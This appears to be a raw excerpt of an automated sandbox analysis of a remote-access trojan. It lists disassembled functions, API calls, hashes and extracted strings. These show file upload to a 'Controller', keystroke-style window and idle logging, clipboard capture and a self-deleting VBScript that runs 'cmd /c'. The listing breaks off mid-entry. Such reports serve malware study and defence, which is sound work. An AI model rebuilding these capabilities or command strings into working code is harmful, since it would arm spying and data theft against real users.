                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                    • __aulldiv.LIBCMT ref: 00408D4D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                    • API String ID: 3086580692-2582957567
                    • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                    • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                    APIs
                    • Sleep.KERNEL32(00001388), ref: 0040A740
                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                    • API String ID: 3795512280-1152054767
                    • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                    • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                    APIs
                    • connect.WS2_32(?,?,?), ref: 004048E0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                    • WSAGetLastError.WS2_32 ref: 00404A21
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                    • API String ID: 994465650-3229884001
                    • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                    • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                    • _free.LIBCMT ref: 004512FF
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00451321
                    • _free.LIBCMT ref: 00451336
                    • _free.LIBCMT ref: 00451341
                    • _free.LIBCMT ref: 00451363
                    • _free.LIBCMT ref: 00451376
                    • _free.LIBCMT ref: 00451384
                    • _free.LIBCMT ref: 0045138F
                    • _free.LIBCMT ref: 004513C7
                    • _free.LIBCMT ref: 004513CE
                    • _free.LIBCMT ref: 004513EB
                    • _free.LIBCMT ref: 00451403
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                    APIs
                    • __EH_prolog.LIBCMT ref: 00419FB9
                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                    • API String ID: 489098229-1431523004
                    • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                    • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                      • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                      • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                      • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                    • ExitProcess.KERNEL32 ref: 0040D9C4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-3159800282
                    • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                    • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                    • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                    APIs
                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                    • GetLastError.KERNEL32 ref: 00455CEF
                    • __dosmaperr.LIBCMT ref: 00455CF6
                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                    • GetLastError.KERNEL32 ref: 00455D0C
                    • __dosmaperr.LIBCMT ref: 00455D15
                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                    • GetLastError.KERNEL32 ref: 00455EB1
                    • __dosmaperr.LIBCMT ref: 00455EB8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                    • __alloca_probe_16.LIBCMT ref: 00453F94
                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                    • __freea.LIBCMT ref: 00454003
                    • __freea.LIBCMT ref: 0045400F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID: \@E
                    • API String ID: 201697637-1814623452
                    • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                    • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                    • __freea.LIBCMT ref: 0044AE30
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                    • __freea.LIBCMT ref: 0044AE39
                    • __freea.LIBCMT ref: 0044AE5E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID: $C$PkGNG
                    • API String ID: 3864826663-3740547665
                    • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                    • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: \&G$\&G$`&G
                    • API String ID: 269201875-253610517
                    • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                    • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 65535$udp
                    • API String ID: 0-1267037602
                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                    • GetForegroundWindow.USER32 ref: 0040AD49
                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                    • String ID: [${ User has been idle for $ minutes }$]
                    • API String ID: 911427763-3954389425
                    • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                    • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                    APIs
                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                    • API String ID: 82841172-425784914
                    • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                    • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                    • __dosmaperr.LIBCMT ref: 0043A8A6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                    • __dosmaperr.LIBCMT ref: 0043A8E3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                    • __dosmaperr.LIBCMT ref: 0043A937
                    • _free.LIBCMT ref: 0043A943
                    • _free.LIBCMT ref: 0043A94A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                    • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                    • TranslateMessage.USER32(?), ref: 0040557E
                    • DispatchMessageA.USER32(?), ref: 00405589
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                    • Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                    APIs
                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: 0VG$0VG$<$@$Temp
                    • API String ID: 1704390241-2575729100
                    • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                    • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                    APIs
                    • OpenClipboard.USER32 ref: 00416941
                    • EmptyClipboard.USER32 ref: 0041694F
                    • CloseClipboard.USER32 ref: 00416955
                    • OpenClipboard.USER32 ref: 0041695C
                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                    • CloseClipboard.USER32 ref: 00416984
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: !D@
                    • API String ID: 2172192267-604454484
                    • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                    • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                    • CloseHandle.KERNEL32(?), ref: 00413465
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                    • String ID:
                    • API String ID: 297527592-0
                    • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                    • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
